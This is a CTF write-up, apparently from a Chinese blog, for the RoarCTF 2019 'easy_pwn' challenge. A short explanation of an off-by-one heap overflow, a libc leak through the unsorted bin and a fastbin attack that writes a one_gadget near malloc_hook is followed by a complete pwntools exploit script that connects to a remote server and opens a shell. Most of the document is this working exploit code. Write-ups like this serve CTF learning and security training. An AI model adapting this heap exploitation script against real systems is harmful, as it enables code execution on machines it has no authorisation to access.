RoarCTF-2019

CTF Pwn CTF

创建时间:2019-10-12 00:00

阅读:

RoarCTF 2019
1. easy_pwn

RoarCTF 2019

easy_pwn

思路:
write note 存在 off-by-one 漏洞。填充 chunk A溢出改写下一个chunk B的size来扩大溢出范围，再分配chunk B 来溢出改写free掉的chunk C's fd到small chunk D,free掉small chunk D,show note 泄漏 unsorted_bin得到libc_base。
再通过溢出改写 fast_bin chunk fd ，分配到malloc_hook附近写 one_gadget。触发 malloc_printerr来getshell

#!/usr/bin/env python
#coding=utf8
from pwn import *
p=process('./easy_pwn')
p=remote('39.97.182.233',40205)
ctx = context
ctx.terminal=['tmux','splitw','-h']


#----- debug info -----#
# ctx.log_level = 'debug'

#----- debug info -----#

#----- quick script -----#
sd =lambda c:p.send(c)
sdl =lambda c:p.sendline(c)
sda = lambda a,c: p.sendafter(a,c)
sdla = lambda a,c: p.sendlineafter(a,c)
rl =lambda :p.recvline()
ru =lambda c:p.recvuntil(c,True)
rle =lambda c:p.recvline_endswith(c,keepends=False)
rls =lambda c:p.recvline_startswith(c,False)
rn = lambda c:p.recvn(c)
uu64 = lambda c:  u64(c.ljust(8,chr(0)))
itr =lambda :p.interactive()
#----- quick script -----#

#----- global variables -----#

#----- global variables -----#
def cmd(c):
    sdla('choice: ',str(c))

def add(sz):
    cmd(1)
    sdla('size: ',str(sz))

def edit(idx,sz,c):
    cmd(2)
    sdla('index: ',str(idx))
    sdla('size: ',str(sz))
    sda('content: ',c)

def edit_over10(idx,sz,c):
    cmd(2)
    sdla('index: ',str(idx))
    sdla('size: ',str(sz+10))
    sda('content: ',c)

def free(idx):
    cmd(3)
    sdla('index: ',str(idx))

def show(idx):
    cmd(4)
    sdla('index: ',str(idx))

def attack():
    # show 0x01122
    add(0x18) #0
    add(0x18) #1

    add(0x18) #2
    add(0x18) #3

    add(0x18) #4
    add(0x18) #5
    add(0x80) #6 0xc0
    add(0x18) #7

    add(0x28) #8
    add(0x28) #9
    add(0x60) #10
    add(0x60) #11
    add(0x28) #12
    add(0x28) #13
    add(0x28) #14

    edit_over10(0,0x18,'a'*0x18+'\x41') #prepare overflow 
    free(1)
    add(0x38) #1
    edit(1,0x20,'\x00'*0x18+p64(0x21)) #recover size;

    edit_over10(4,0x18,'a'*0x18+'\xb1') 
    free(5)
    add(0xa1) #5
    edit(5,0x20,'\x00'*0x18+p64(0x21))

    free(3)
    free(2)

    edit(1,0x21,'a'*0x18+p64(0x21)+'\xc0')
    add(0x18) #2
    add(0x18) #3

    edit(5,0x20,'\x00'*0x18+p64(0x91))
    free(6)
    show(3)

    unsorted_bin=uu64(rn(6+9)[9:])
    print(hex(unsorted_bin))
    base=unsorted_bin-0x3c4b78
    print(hex(base))
    fake_chunk=base+3951365-0x10-0x8
    one=base+0xf02a4
    print(hex(one))

    add(0x80)

    edit_over10(8,0x28,'a'*0x28+'\xa1')
    free(9)
    add(0x98) #9
    edit(9,0x30,'\x00'*0x28+p64(0x71))

    free(11)
    free(10)
    edit(9,0x38,'\x00'*0x28+p64(0x71)+p64(fake_chunk))
    add(0x60) #10
    add(0x60) #11

    edit(11,0x13+8,0x13*'\x00'+p64(one))
    show(0)

    edit_over10(12,0x28,'a'*0x28+'\x88')
    free(13)

    #gdb.attach(p,'b *')
    #free(6)

    #add(0x20)
    itr()

    pass


if __name__=="__main__":
    attack()

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。